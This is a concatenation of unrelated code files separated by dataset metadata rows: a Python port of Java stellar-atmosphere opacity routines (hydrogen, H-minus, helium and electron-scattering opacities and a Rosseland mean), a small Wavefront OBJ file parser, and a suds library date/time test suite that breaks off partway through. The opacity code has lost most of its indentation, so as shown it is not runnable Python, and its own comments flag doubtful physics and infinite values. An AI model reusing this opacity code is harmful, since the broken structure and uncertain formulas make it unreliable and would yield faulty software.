# //logChi = logLog10E + logLambdanm - logChiFac; //lambda in nm here
# //chi = Math.exp(logChi);
loggffHelp = logLog10E - logChiLambda
#//
#//
#//
#// ****** Start depth loop iTau ******
#//
#//
#//
#//
for iTau in range(numDeps):
#//
# //Re-initialize all accumulators to be on safe side:
kappa = 0.0
logKapH1bf = -99.0
logKapH1ff = -99.0
logKapHmbf = -99.0
logKapHmff = -99.0
logKapH2p = -99.0
logKapHe = -99.0
logKapHemff = -99.0
logKapE = -99.0
#//
#//
#//if (iTau == 36 && iLam == 142){
#// System.out.println("lambdanm[142] " + lambdanm + " temp[0][iTau=36] " + temp[0][iTau=36]);
#// }
#//This is "theta" ~ 5040/T:
logTheta = logLog10E - logKeV - temp[1][iTau]
log10Theta = log10E * logTheta
theta = math.exp(logTheta)
#//System.out.println("theta " + theta + " logTheta " + logTheta);
#// temperature- and wavelength-dependent stimulated emission coefficient:
stimHelp = -1.0 * theta * chiLambda * logE10
stimEm = 1.0 - math.exp(stimHelp)
logStimEm = math.log(stimEm)
# // if (iTau == 36 && iLam == 142){
# // System.out.println("stimEm " + stimEm);
# //}
ffBracket = math.exp(loggffHelp - logTheta) + 0.5
gff = 1.0 + (gauntHelp*ffBracket)
#//if (iTau == 36 && iLam == 1){
#// System.out.println("gff " + gff);
#// }
loggff = math.log(gff)
#//H I b-f:
#//Start at largest threshold wavelength and break out of loop when next threshold lambda is less than current lambda:
bfSum = 0.0 #//initialize accumulator
logHelp3 = logA0 + 3.0*logLambdaA #//lambda in A here
#for (int iThresh = numHlevs-1; iThresh >= 0; iThresh--){
            for iThresh in range(numHlevs-1, -1, -1): #count down over E-levels; the original range(0, numHlevs-1, -1) was empty
if (threshLambs[iThresh] < lambdanm):
break
n = 1.0 + float(iThresh)
if (lambdanm <= threshLambs[iThresh]):
#//this E-level contributes
logbfTerm = loggbf[iThresh] - 3.0*math.log(n)
logbfTerm = logbfTerm - (theta*chiHlev[iThresh])*logE10
bfSum = bfSum + math.exp(logbfTerm)
#//if (iTau == 36 && iLam == 142){
# //System.out.println("lambdanm " + lambdanm + " iThresh " + iThresh + " threshLambs[iThresh] " + threshLambs[iThresh]);
# //System.out.println("loggbf " + loggbf[iThresh] + " theta " + theta + " chiHlev " + chiHlev[iThresh]);
# //System.out.println("bfSum " + bfSum + " logbfTerm " + logbfTerm);
#// }
#//end iThresh loop
#// cm^2 per *neutral* H atom
logKapH1bf = logHelp3 + math.log(bfSum)
#//Stimulated emission correction
logKapH1bf = logKapH1bf + logStimEm
#//System.out.println("lambda " + lambdas[iLam] + "iTau " + iTau + " sigma " + Math.exp(logKapH1bf));
#//Add it in to total - opacity per neutral HI atom, so multiply by logNH1
#// This is now linear opacity in cm^-1
logKapH1bf = logKapH1bf + logNH1[iTau]
#//System.out.println(" aH1 " + Math.exp(logKapH1bf));
#////Nasty fix to make Balmer lines show up in A0 stars!
#// if (teff > 8000){
#// logKapH1bf = logKapH1bf - logE10*1.5;
#//
kappa = math.exp(logKapH1bf)
#//System.out.println("HIbf " + log10E*logKapH1bf);
#//if (iTau == 36 && iLam == 142){
#// System.out.println("lambdaA " + lambdaA + " logKapH1bf " + log10E*(logKapH1bf)); //-rho[1][iTau]));
#//}
#//H I f-f:
#// cm^2 per *neutral* H atom
logKapH1ff = logHelp3 + loggff + logffHelp - logTheta - (theta*chiIH)*logE10
#//Stimulated emission correction
logKapH1ff = logKapH1ff + logStimEm
#//Add it in to total - opacity per neutral HI atom, so multiply by logNH1
#// This is now linear opacity in cm^-1
logKapH1ff = logKapH1ff + logNH1[iTau]
#////Nasty fix to make Balmer lines show up in A0 stars!
#// if (teff > 8000){
#// logKapH1ff = logKapH1ff - logE10*1.5;
#//
kappa = kappa + math.exp(logKapH1ff);
#//System.out.println("HIff " + log10E*logKapH1ff);
#//if (iTau == 36 && iLam == 142){
#// System.out.println("logKapH1ff " + log10E*(logKapH1ff)); //-rho[1][iTau]));
#//}
#//
#//Hminus:
#//
#// H^- b-f:
#//if (iTau == 36 && iLam == 142){
# // System.out.println("temp " + temp[0][iTau] + " lambdanm " + lambdanm);
# // }
logKapHmbf = -99.0 #//initialize default
#//if ( (temp[0][iTau] > 2500.0) && (temp[0][iTau] < 10000.0) ){
#//if ( (temp[0][iTau] > 2500.0) && (temp[0][iTau] < 8000.0) ){
            #//Try lowering the lower Teff limit to avoid opacity collapse in outer layers of late-type stars
if ( (temp[0][iTau] > 1000.0) and (temp[0][iTau] < 10000.0) ):
if ((lambdanm > 225.0) and (lambdanm < 1500.0) ): # //nm
#//if (iTau == 36 && iLam == 142){
# // System.out.println("In KapHmbf condition...");
#//}
ii = 0.0
alphaHmbf = signAHm[0]*math.exp(logAHm[0]) #//initialize accumulator
#for (int i = 1; i < numHmTerms; i++){
for i in range(1, numHmTerms):
ii = float(i)
#//if (iTau == 36 && iLam == 142){
#// System.out.println("ii " + ii);
#//}
logTermHmbf = logAHm[i] + ii*logLambdaA
alphaHmbf = alphaHmbf + signAHm[i]*math.exp(logTermHmbf)
#//if (iTau == 36 && iLam == 142){
#// System.out.println("logTermHmbf " + log10E*logTermHmbf + " i " + i + " logAHm " + log10E*logAHm[i]);
#//}
logAlphaHmbf = math.log(alphaHmbf)
#// cm^2 per neutral H atom
logKapHmbf = logAHmbf + logAlphaHmbf + pe[1][iTau] + 2.5*logTheta + (0.754*theta)*logE10
#//Stimulated emission correction
logKapHmbf = logKapHmbf + logStimEm
#//if (iTau == 36 && iLam == 142){
#// System.out.println("alphaHmbf " + alphaHmbf);
#// System.out.println("logKapHmbf " + log10E*logKapHmbf + " logAHmbf " + log10E*logAHmbf + " logAlphaHmbf " + log10E*logAlphaHmbf);
#// }
#//Add it in to total - opacity per neutral HI atom, so multiply by logNH1
#// This is now linear opacity in cm^-1
logKapHmbf = logKapHmbf + logNH1[iTau]
kappa = kappa + math.exp(logKapHmbf)
#//System.out.println("Hmbf " + log10E*logKapHmbf);
#//if (iTau == 36 && iLam == 142){
#// System.out.println("logKapHmbf " + log10E*(logKapHmbf)); //-rho[1][iTau]));
#//}
#//wavelength condition
#// temperature condition
#// H^- f-f:
logKapHmff = -99.0 #//initialize default
#//if ( (temp[0][iTau] > 2500.0) && (temp[0][iTau] < 10000.0) ){
            #//Try lowering the lower Teff limit to avoid opacity collapse in outer layers of late-type stars
#//if ( (temp[0][iTau] > 2500.0) && (temp[0][iTau] < 8000.0) ){
if ( (temp[0][iTau] > 1000.0) and (temp[0][iTau] < 10000.0) ):
if ((lambdanm > 260.0) and (lambdanm < 11390.0) ): #//nm
#//construct "f_n" polynomials in log(lambda)
for j in range(3):
fHm[j] = fHmTerms[j][0] #//initialize accumulators
ii = 0.0
for i in range(1, numHmffTerms):
ii = float(i)
logLambdaAFac = math.pow(log10LambdaA, ii)
for j in range(3):
fHm[j] = fHm[j] + (fHmTerms[j][i]*logLambdaAFac)
#} #// i
#} #// j
#//
fPoly = fHm[0] + fHm[1]*log10Theta + fHm[2]*log10Theta*log10Theta
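                    #//i.e. the Bell &amp; Berrington / Gray H^- free-free fit,
                    #//  kap(Hmff) = A * Pe * 10^(f0 + f1*log10(theta) + f2*log10(theta)^2)
                    #//per neutral H atom, with the constant A presumably carried in logAHmff.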
#// In cm^2 per neutral H atom:
                    #// Stimulated emission already accounted for
logKapHmff = logAHmff + pe[1][iTau] + fPoly*logE10
#//Add it in to total - opacity per neutral HI atom, so multiply by logNH1
#// This is now linear opacity in cm^-1
logKapHmff = logKapHmff + logNH1[iTau]
kappa = kappa + math.exp(logKapHmff)
#//System.out.println("Hmff " + log10E*logKapHmff);
#//if (iTau == 36 && iLam == 142){
#// System.out.println("logKapHmff " + log10E*(logKapHmff)); //-rho[1][iTau]));
#//}
#//wavelength condition
#// temperature condition
#// H^+_2:
#//
logKapH2p = -99.0 #//initialize default
if ( temp[0][iTau] < 4000.0 ):
if ((lambdanm > 380.0) and (lambdanm < 2500.0) ): # //nm
sigmaH2p = sigmaH2pTerm[0] #//initialize accumulator
UH2p = UH2pTerm[0] #//initialize accumulator
                    ii = 0.0
for i in range(1, numH2pTerms):
ii = float(i)
logLambdaAFac = math.pow(log10LambdaA, ii)
#// kapH2p way too large with lambda in A - try cm: No! - leads to negative logs
#//logLambdaAFac = Math.pow(logLambda, ii);
sigmaH2p = sigmaH2p + sigmaH2pTerm[i] * logLambdaAFac
UH2p = UH2p + UH2pTerm[i] * logLambdaAFac
logSigmaH2p = math.log(sigmaH2p)
logKapH2p = logAH2p + logSigmaH2p - (UH2p*theta)*logE10 + logNH2[iTau]
#//Stimulated emission correction
logKapH2p = logKapH2p + logStimEm
#//Add it in to total - opacity per neutral HI atom, so multiply by logNH1
#// This is now linear opacity in cm^-1
logKapH2p = logKapH2p + logNH1[iTau]
kappa = kappa + math.exp(logKapH2p)
#//System.out.println("H2p " + log10E*logKapH2p);
#//if (iTau == 16 && iLam == 142){
# //System.out.println("logKapH2p " + log10E*(logKapH2p-rho[1][iTau]) + " logAH2p " + log10E*logAH2p
#// + " logSigmaH2p " + log10E*logSigmaH2p + " (UH2p*theta)*logE10 " + log10E*((UH2p*theta)*logE10) + " logNH2[iTau] " + log10E*logNH2[iTau]);
#//}
#//wavelength condition
#// temperature condition
#//He I
#//
#// HeI b-f + f-f
#//Scale sum of He b-f and f-f with sum of HI b-f and f-f
#//wavelength condition comes from requirement that lower E level be greater than n=2 (edge at 22.78 nm)
logKapHe = -99.0 #//default intialization
if ( temp[0][iTau] > 10000.0 ):
if (lambdanm > 22.8): #//nm
totalH1Kap = math.exp(logKapH1bf) + math.exp(logKapH1ff)
logTotalH1Kap = math.log(totalH1Kap)
helpHe = Useful.k() * temp[0][iTau]
#// cm^2 per neutral H atom (after all, it's scaled wrt kappHI
#// Stimulated emission already accounted for
#//
#// *** CAUTION: Is this *really* the right thing to do???
#// - we're re-scaling the final H I kappa in cm^2/g corrected for stim em, NOT the raw cross section
logKapHe = math.log(4.0) - (10.92 / helpHe) + logTotalH1Kap
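                    #//i.e. kap(He) ~ 4 * exp(-chi/kT) * kap(HIbf+ff) with chi = 10.92 eV,
                    #//a Boltzmann-factor rescaling of the hydrogen opacity; this reads
                    #//correctly only if Useful.k() is in eV/K so that 10.92/helpHe is
                    #//dimensionless (an assumption about the ported constants).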
#//Add it in to total - opacity per neutral HI atom, so multiply by logNH1
#// This is now linear opacity in cm^-1
logKapHe = logKapHe + logNH1[iTau]
kappa = kappa + math.exp(logKapHe)
#//System.out.println("He " + log10E*logKapHe);
#//if (iTau == 36 && iLam == 142){
#// System.out.println("logKapHe " + log10E*(logKapHe)); //-rho[1][iTau]));
#//}
#//wavelength condition
#// temperature condition
#//
#//He^- f-f:
logKapHemff = -99.0 #//default initialization
if ( (theta > 0.5) and (theta < 2.0) ):
if ((lambdanm > 500.0) and (lambdanm < 15000.0) ):
#// initialize accumulators:
                    cHemff[0] = signC0HemffTerm[0]*math.exp(logC0HemffTerm[0])
                    #//System.out.println("C0HemffTerm " + signC0HemffTerm[0]*Math.exp(logC0HemffTerm[0]));
                    cHemff[1] = signC1HemffTerm[0]*math.exp(logC1HemffTerm[0])
                    #//System.out.println("C1HemffTerm " + signC1HemffTerm[0]*Math.exp(logC1HemffTerm[0]));
                    cHemff[2] = signC2HemffTerm[0]*math.exp(logC2HemffTerm[0])
                    #//System.out.println("C2HemffTerm " + signC2HemffTerm[0]*Math.exp(logC2HemffTerm[0]));
                    cHemff[3] = signC3HemffTerm[0]*math.exp(logC3HemffTerm[0])
#//System.out.println("C3HemffTerm " + signC3HemffTerm[0]*Math.exp(logC3HemffTerm[0]));
#//build the theta polynomial coefficients
ii = 0.0
for i in range(1, numHemffTerms):
ii = float(i)
thisLogTerm = ii*logTheta + logC0HemffTerm[i]
cHemff[0] = cHemff[0] + signC0HemffTerm[i]*math.exp(thisLogTerm)
#//System.out.println("i " + i + " ii " + ii + " C0HemffTerm " + signC0HemffTerm[i]*Math.exp(logC0HemffTerm[i]));
thisLogTerm = ii*logTheta + logC1HemffTerm[i]
cHemff[1] = cHemff[1] + signC1HemffTerm[i]*math.exp(thisLogTerm)
#//System.out.println("i " + i + " ii " + ii + " C1HemffTerm " + signC1HemffTerm[i]*Math.exp(logC1HemffTerm[i]));
thisLogTerm = ii*logTheta + logC2HemffTerm[i]
cHemff[2] = cHemff[2] + signC2HemffTerm[i]*math.exp(thisLogTerm)
#//System.out.println("i " + i + " ii " + ii + " C2HemffTerm " + signC2HemffTerm[i]*Math.exp(logC2HemffTerm[i]));
thisLogTerm = ii*logTheta + logC3HemffTerm[i]
cHemff[3] = cHemff[3] + signC3HemffTerm[i]*math.exp(thisLogTerm)
#//System.out.println("i " + i + " ii " + ii + " C3HemffTerm " + signC3HemffTerm[i]*Math.exp(logC3HemffTerm[i]));
#//// Should polynomial expansion for Cs be in log10Theta??: - No! Doesn't help
#// initialize accumulators:
#// cHemff[0] = C0HemffTerm[0];
#// cHemff[1] = C1HemffTerm[0];
#// cHemff[2] = C2HemffTerm[0];
#// cHemff[3] = C3HemffTerm[0];
#// ii = 0.0;
#// for (int i = 1; i < numHemffTerms; i++){
#// ii = (double) i;
#// log10ThetaFac = Math.pow(log10Theta, ii);
#// thisTerm = log10ThetaFac * C0HemffTerm[i];
#// cHemff[0] = cHemff[0] + thisTerm;
#// thisTerm = log10ThetaFac * C1HemffTerm[i];
#// cHemff[1] = cHemff[1] + thisTerm;
#// thisTerm = log10ThetaFac * C2HemffTerm[i];
#// cHemff[2] = cHemff[2] + thisTerm;
#// thisTerm = log10ThetaFac * C3HemffTerm[i];
#// cHemff[3] = cHemff[3] + thisTerm;
#// }
#//Build polynomial in logLambda for alpha(He^1_ff):
log10AlphaHemff = cHemff[0] #//initialize accumulation
#//System.out.println("cHemff[0] " + cHemff[0]);
ii = 0.0
for i in range(1, 3+1):
#//System.out.println("i " + i + " cHemff[i] " + cHemff[i]);
ii = float(i)
thisTerm = cHemff[i] * math.pow(log10LambdaA, ii)
log10AlphaHemff = log10AlphaHemff + thisTerm
#//System.out.println("log10AlphaHemff " + log10AlphaHemff);
alphaHemff = math.pow(10.0, log10AlphaHemff) #//gives infinite alphas!
#// alphaHemff = log10AlphaHemff; // ?????!!!!!
#//System.out.println("alphaHemff " + alphaHemff);
#// Note: this is the extinction coefficient per *Hydrogen* particle (NOT He- particle!)
# //nHe = Math.exp(logNHe1[iTau]) + Math.exp(logNHe2[iTau]);
# //logNHe = Math.log(nHe);
# //logKapHemff = Math.log(alphaHemff) + Math.log(AHe) + pe[1][iTau] + logNHe1[iTau] - logNHe;
logKapHemff = logAHemff + math.log(alphaHemff) + pe[1][iTau] + logNHe1[iTau] - logNH[iTau]
#//Stimulated emission already accounted for
#//Add it in to total - opacity per H particle, so multiply by logNH
#// This is now linear opacity in cm^-1
logKapHemff = logKapHemff + logNH[iTau]
kappa = kappa + math.exp(logKapHemff)
#//System.out.println("Hemff " + log10E*logKapHemff);
#//if (iTau == 36 && iLam == 155){
#//if (iLam == 155){
#// System.out.println("logKapHemff " + log10E*(logKapHemff)); //-rho[1][iTau]));
#//}
#//wavelength condition
#// temperature condition
#//
#// electron (e^-1) scattering (Thomson scattering)
#//coefficient per *"hydrogen atom"* (NOT per e^-!!) (neutral or total H??):
logKapE = logAlphaE + Ne[1][iTau] - logNH[iTau]
            #//Stimulated emission not relevant
#//Add it in to total - opacity per H particle, so multiply by logNH
#// This is now linear opacity in cm^-1
            #//I know, we're adding logNH right back in after subtracting it off, but this is for clarity and consistency for now... :
logKapE = logKapE + logNH[iTau]
kappa = kappa + math.exp(logKapE)
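            #//Thomson scattering is grey (wavelength-independent): kap_e = sigma_T * n_e,
            #//with sigma_T ~ 6.652e-25 cm^2 presumably carried in logAlphaE and Ne[1]
            #//holding ln(n_e).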
#//System.out.println("E " + log10E*logKapE);
#//if (iTau == 36 && iLam == 142){
#// System.out.println("logKapE " + log10E*(logKapE)); //-rho[1][iTau]));
#//}
#//Metal b-f
#//Fig. 8.6 Gray 3rd Ed.
#//
#//
#// This is now linear opacity in cm^-1
#// Divide by mass density
#// This is now mass extinction in cm^2/g
#//
logKappa[iLam][iTau] = math.log(kappa) - rho[1][iTau]
            #// Fudge is in cm^2/g: Convert to natural log:
logEKapFudge = logE10 * logKapFudge
logKappa[iLam][iTau] = logKappa[iLam][iTau] + logEKapFudge
#//if (iTau == 36 && iLam == 142){
#//System.out.println(" " + log10E*(logKappa[iLam][iTau]+rho[1][iTau]));
#//}
#// close iTau depth loop
#//
#//close iLam wavelength loop
return logKappa
#} //end method kappas2
def kapRos(numDeps, numLams, lambdas, logKappa, temp):
kappaRos = [ [0.0 for i in range(numDeps)] for j in range(2) ]
#double numerator, denominator, deltaLam, logdBdTau, logNumerator, logDenominator;
#double logTerm, logDeltaLam, logInvKap, logInvKapRos;
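    # The Rosseland mean is the harmonic, dB/dT-weighted average over wavelength:
    #   1/kapRos = Integral[(1/kap_lambda) * (dB_lambda/dT) dlambda]
    #              / Integral[(dB_lambda/dT) dlambda]
    # approximated below by rectangle-rule sums over the lambda grid.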
for iTau in range(numDeps):
numerator = 0.0 #//initialize accumulator
denominator = 0.0
for iLam in range(1, numLams):
deltaLam = lambdas[iLam] - lambdas[iLam-1] #//lambda in cm
logDeltaLam = math.log(deltaLam)
logInvKap = -1.0 * logKappa[iLam][iTau]
logdBdTau = Planck.dBdT(temp[0][iTau], lambdas[iLam])
logTerm = logdBdTau + logDeltaLam
denominator = denominator + math.exp(logTerm)
            logTerm = logTerm + logInvKap
numerator = numerator + math.exp(logTerm)
logNumerator = math.log(numerator)
logDenominator = math.log(denominator)
logInvKapRos = logNumerator - logDenominator
kappaRos[1][iTau] = -1.0 * logInvKapRos #//logarithmic
kappaRos[0][iTau] = math.exp(kappaRos[1][iTau])
return kappaRos
#} //end method kapRos
|
mit
| -5,651,264,113,527,596,000
| 39.857322
| 142
| 0.555948
| false
| 2.590395
| false
| false
| false
|
Aeva/silver
|
obj_parser.py
|
1
|
1318
|
# This file is part of Silver.
#
# Silver is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Silver is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with VoxelPress. If not, see <http://www.gnu.org/licenses/>.
#
# Have a nice day!
from model_tools import *
def obj_parser(fileob):
"""
Parser for wavefront obj files. File format reference:
http://en.wikipedia.org/wiki/Wavefront_.obj_file
"""
verts = []
vertbuffer = []
for line in fileob:
        if line.strip().startswith("v "):  # geometric vertices only (skips "vt"/"vn" and blank lines)
verts.append(str2vector(line))
        if line.strip().startswith("f "):
params = line.strip().split(" ")[1:]
if line.count("/"):
params = [p.split("/")[0] for p in params]
            params = [int(x) - 1 for x in params]  # OBJ indices are 1-based
for i in params:
vertbuffer += verts[i]
return vertbuffer
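# A minimal usage sketch (hypothetical file name; str2vector is supplied by
# model_tools and is expected to turn one "v x y z" line into [x, y, z]):
#
#     with open("model.obj") as fileob:
#         flat_verts = obj_parser(fileob)  # [x0, y0, z0, x1, y1, z1, ...]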
|
gpl-3.0
| 7,802,623,028,144,939,000
| 27.652174
| 69
| 0.636571
| false
| 3.702247
| false
| false
| false
|
pexip/os-python-suds-jurko
|
tests/test_date_time.py
|
1
|
16814
|
# This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( jortel@redhat.com )
"""
Date & time related suds Python library unit tests.
Implemented using the 'pytest' testing framework.
"""
if __name__ == "__main__":
try:
import pytest
pytest.main(["--pyargs", __file__])
except ImportError:
print("'py.test' unit testing framework not available. Can not run "
"'{}' directly as a script.".format(__file__))
import sys
sys.exit(-2)
from suds.sax.date import (Date, DateTime, Time, UtcTimezone,
FixedOffsetTimezone)
from suds.xsd.sxbuiltin import XDate, XDateTime, XTime
import tests
import pytest
import datetime
tests.setup_logging()
class _Dummy:
"""Class for testing unknown object class handling."""
pass
"""Invalid date strings reused for both date & datetime testing."""
_invalid_date_strings = (
"",
"abla",
"12",
"12-01",
"-12-01",
"1900-01",
"+1900-10-01", # Plus sign not allowed.
"1900-13-01", # Invalid month.
"1900-02-30", # Invalid day.
"2001-02-29", # Not a leap year.
"2100-02-29", # Not a leap year.
" 1900-01-01",
"1900- 01-01",
"1900-01 -01",
"1900-01-01 ",
"1900-13-011",
"1900-01-01X",
"1900-01-01T", # 'T' is a date/time separator for DateTime.
# Invalid time zone indicators.
"1900-01-01 +17:00",
"1900-01-01+ 17:00",
"1900-01-01*17:00",
"1900-01-01 17:00",
"1900-01-01+17:",
"1900-01-01+170",
"1900-01-01+1730",
"1900-01-01+170:00",
"1900-01-01+17:00:00",
"1900-01-01-:4",
"1900-01-01-2a:00",
"1900-01-01-222:00",
"1900-01-01-12:000"
"1900-01-01+00:60",
"1900-01-01-00:99")
"""Invalid date strings reused for both time & datetime testing."""
_invalid_time_strings = (
"",
"bunga",
"12",
"::",
"12:",
"12:01",
"12:01:",
"12:01: 00",
"12:01: 00",
"23: 01:00",
" 23:01:00",
"23 :01:00",
"23::00",
"23:000:00",
"023:00:00",
"23:00:000",
"25:01:00",
"-1:01:00",
"24:01:00",
"23:-1:00",
"23:61:00",
"23:60:00",
"23:59:-1",
"23:59:61",
"23:59:60",
"7.59.13",
"7-59-13",
"-0:01:00",
"23:-0:00",
"23:59:-0",
"23:59:6.a",
"23:59:6.",
"23:59:6:0",
"23:59:6.12x",
"23:59:6.12x45",
"23:59:6.999999 ",
"23:59:6.999999x",
"T23:59:6",
# Invalid time zone indicators.
"13:27:04 -10:00",
"13:27:04- 10:00",
"13:27:04*17:00",
"13:27:04 17:00",
"13:27:04-003",
"13:27:04-003:00",
"13:27:04+00:002",
"13:27:04-13:60",
"13:27:04-121",
"13:27:04-1210",
"13:27:04-121:00",
"13:27:04+12:",
"13:27:04+12:00:00",
"13:27:04-:13"
"13:27:04-24:00"
"13:27:04+99:00")
class TestDate:
"""Tests for the suds.sax.date.Date class."""
def testConstructFromDate(self):
date = datetime.date(2001, 12, 10)
assert Date(date).value is date
def testConstructFromDateTime_naive(self):
date = datetime.datetime(2001, 12, 10, 10, 50, 21, 32132)
assert Date(date).value == datetime.date(2001, 12, 10)
@pytest.mark.parametrize("hours", (5, 20))
def testConstructFromDateTime_tzAware(self, hours):
tz = FixedOffsetTimezone(10)
date = datetime.datetime(2001, 12, 10, hours, 50, 21, 32132, tzinfo=tz)
assert Date(date).value == datetime.date(2001, 12, 10)
@pytest.mark.parametrize(("string", "y", "m", "d"), (
("1900-01-01", 1900, 1, 1),
("1900-1-1", 1900, 1, 1),
("1900-01-01z", 1900, 1, 1),
("1900-01-01Z", 1900, 1, 1),
("1900-01-01-02", 1900, 1, 1),
("1900-01-01+2", 1900, 1, 1),
("1900-01-01+02:00", 1900, 1, 1),
("1900-01-01+99:59", 1900, 1, 1),
("1900-01-01-21:13", 1900, 1, 1),
("2000-02-29", 2000, 2, 29))) # Leap year.
def testConstructFromString(self, string, y, m, d):
assert Date(string).value == datetime.date(y, m, d)
@pytest.mark.parametrize("string", _invalid_date_strings)
def testConstructFromString_failure(self, string):
pytest.raises(ValueError, Date, string)
@pytest.mark.parametrize("source", (
None,
object(),
_Dummy(),
datetime.time(10, 10)))
def testConstructFromUnknown(self, source):
pytest.raises(ValueError, Date, source)
@pytest.mark.parametrize(("input", "output"), (
("1900-01-01", "1900-01-01"),
("2000-02-29", "2000-02-29"),
("1900-1-1", "1900-01-01"),
("1900-01-01z", "1900-01-01"),
("1900-01-01Z", "1900-01-01"),
("1900-01-01-02", "1900-01-01"),
("1900-01-01+2", "1900-01-01"),
("1900-01-01+02:00", "1900-01-01"),
("1900-01-01+99:59", "1900-01-01"),
("1900-01-01-21:13", "1900-01-01")))
def testConvertToString(self, input, output):
assert str(Date(input)) == output
class TestDateTime:
"""Tests for the suds.sax.date.DateTime class."""
def testConstructFromDateTime(self):
dt = datetime.datetime(2001, 12, 10, 1, 1)
assert DateTime(dt).value is dt
        dt = dt.replace(tzinfo=UtcTimezone())
assert DateTime(dt).value is dt
@pytest.mark.parametrize(
("string", "y", "M", "d", "h", "m", "s", "micros"), (
("2013-11-19T14:05:23.428068", 2013, 11, 19, 14, 5, 23, 428068),
("2013-11-19 14:05:23.4280", 2013, 11, 19, 14, 5, 23, 428000)))
def testConstructFromString(self, string, y, M, d, h, m, s, micros):
assert DateTime(string).value == datetime.datetime(y, M, d, h, m, s,
micros)
@pytest.mark.parametrize("string",
[x + "T00:00:00" for x in _invalid_date_strings] +
["2000-12-31T" + x for x in _invalid_time_strings] + [
# Invalid date/time separator characters.
"2013-11-1914:05:23.428068",
"2013-11-19X14:05:23.428068"])
def testConstructFromString_failure(self, string):
pytest.raises(ValueError, DateTime, string)
@pytest.mark.parametrize(
("string", "y", "M", "d", "h", "m", "s", "micros"), (
("2000-2-28T23:59:59.9999995", 2000, 2, 29, 0, 0, 0, 0),
("2000-2-29T23:59:59.9999995", 2000, 3, 1, 0, 0, 0, 0),
("2013-12-31T23:59:59.9999994", 2013, 12, 31, 23, 59, 59, 999999),
("2013-12-31T23:59:59.99999949", 2013, 12, 31, 23, 59, 59, 999999),
("2013-12-31T23:59:59.9999995", 2014, 1, 1, 0, 0, 0, 0)))
def testConstructFromString_subsecondRounding(self, string, y, M, d, h, m,
s, micros):
ref = datetime.datetime(y, M, d, h, m, s, micros)
assert DateTime(string).value == ref
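    # (The parametrized cases above pin down the parser's rounding rule:
    # fractional seconds beyond microsecond precision appear to round
    # half-up, carrying into the seconds and, in the leap-day cases, the
    # date when the rounded value overflows.)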
@pytest.mark.parametrize(
("string", "y", "M", "d", "h", "m", "s", "micros", "tz_h", "tz_m"), (
("2013-11-19T14:05:23.428068-3",
2013, 11, 19, 14, 5, 23, 428068, -3, 0),
("2013-11-19T14:05:23.068+03",
2013, 11, 19, 14, 5, 23, 68000, 3, 0),
("2013-11-19T14:05:23.428068-02:00",
2013, 11, 19, 14, 5, 23, 428068, -2, 0),
("2013-11-19T14:05:23.428068+02:00",
2013, 11, 19, 14, 5, 23, 428068, 2, 0),
("2013-11-19T14:05:23.428068-23:59",
2013, 11, 19, 14, 5, 23, 428068, -23, -59)))
def testConstructFromString_timezone(self, string, y, M, d, h, m, s,
micros, tz_h, tz_m):
tzdelta = datetime.timedelta(hours=tz_h, minutes=tz_m)
tzinfo = FixedOffsetTimezone(tzdelta)
ref = datetime.datetime(y, M, d, h, m, s, micros, tzinfo=tzinfo)
assert DateTime(string).value == ref
@pytest.mark.parametrize("source", (
None,
object(),
_Dummy(),
datetime.date(2010, 10, 27),
datetime.time(10, 10)))
def testConstructFromUnknown(self, source):
pytest.raises(ValueError, DateTime, source)
@pytest.mark.parametrize(("input", "output"), (
("2013-11-19T14:05:23.428068", "2013-11-19T14:05:23.428068"),
("2013-11-19 14:05:23.4280", "2013-11-19T14:05:23.428000"),
("2013-12-31T23:59:59.9999995", "2014-01-01T00:00:00"),
("2013-11-19T14:05:23.428068-3", "2013-11-19T14:05:23.428068-03:00"),
("2013-11-19T14:05:23.068+03", "2013-11-19T14:05:23.068000+03:00"),
("2013-11-19T14:05:23.4-02:00", "2013-11-19T14:05:23.400000-02:00"),
("2013-11-19T14:05:23.410+02:00", "2013-11-19T14:05:23.410000+02:00"),
("2013-11-19T14:05:23.428-23:59", "2013-11-19T14:05:23.428000-23:59")))
def testConvertToString(self, input, output):
assert str(DateTime(input)) == output
class TestTime:
"""Tests for the suds.sax.date.Time class."""
def testConstructFromTime(self):
time = datetime.time(1, 1)
assert Time(time).value is time
        time = time.replace(tzinfo=UtcTimezone())
assert Time(time).value is time
@pytest.mark.parametrize(("string", "h", "m", "s", "micros"), (
("10:59:47", 10, 59, 47, 0),
("9:9:13", 9, 9, 13, 0),
("18:0:09.2139", 18, 0, 9, 213900),
("18:0:09.02139", 18, 0, 9, 21390),
("18:0:09.002139", 18, 0, 9, 2139),
("0:00:00.00013", 0, 0, 0, 130),
("0:00:00.000001", 0, 0, 0, 1),
("0:00:00.000000", 0, 0, 0, 0),
("23:59:6.999999", 23, 59, 6, 999999),
("1:13:50.0", 1, 13, 50, 0)))
def testConstructFromString(self, string, h, m, s, micros):
assert Time(string).value == datetime.time(h, m, s, micros)
@pytest.mark.parametrize("string", _invalid_time_strings)
def testConstructFromString_failure(self, string):
pytest.raises(ValueError, Time, string)
@pytest.mark.parametrize(("string", "h", "m", "s", "micros"), (
("0:0:0.0000000", 0, 0, 0, 0),
("0:0:0.0000001", 0, 0, 0, 0),
("0:0:0.0000004", 0, 0, 0, 0),
("0:0:0.0000005", 0, 0, 0, 1),
("0:0:0.0000006", 0, 0, 0, 1),
("0:0:0.0000009", 0, 0, 0, 1),
("0:0:0.5", 0, 0, 0, 500000),
("0:0:0.5000004", 0, 0, 0, 500000),
("0:0:0.5000005", 0, 0, 0, 500001),
("0:0:0.50000050", 0, 0, 0, 500001),
("0:0:0.50000051", 0, 0, 0, 500001),
("0:0:0.50000055", 0, 0, 0, 500001),
("0:0:0.50000059", 0, 0, 0, 500001),
("0:0:0.5000006", 0, 0, 0, 500001),
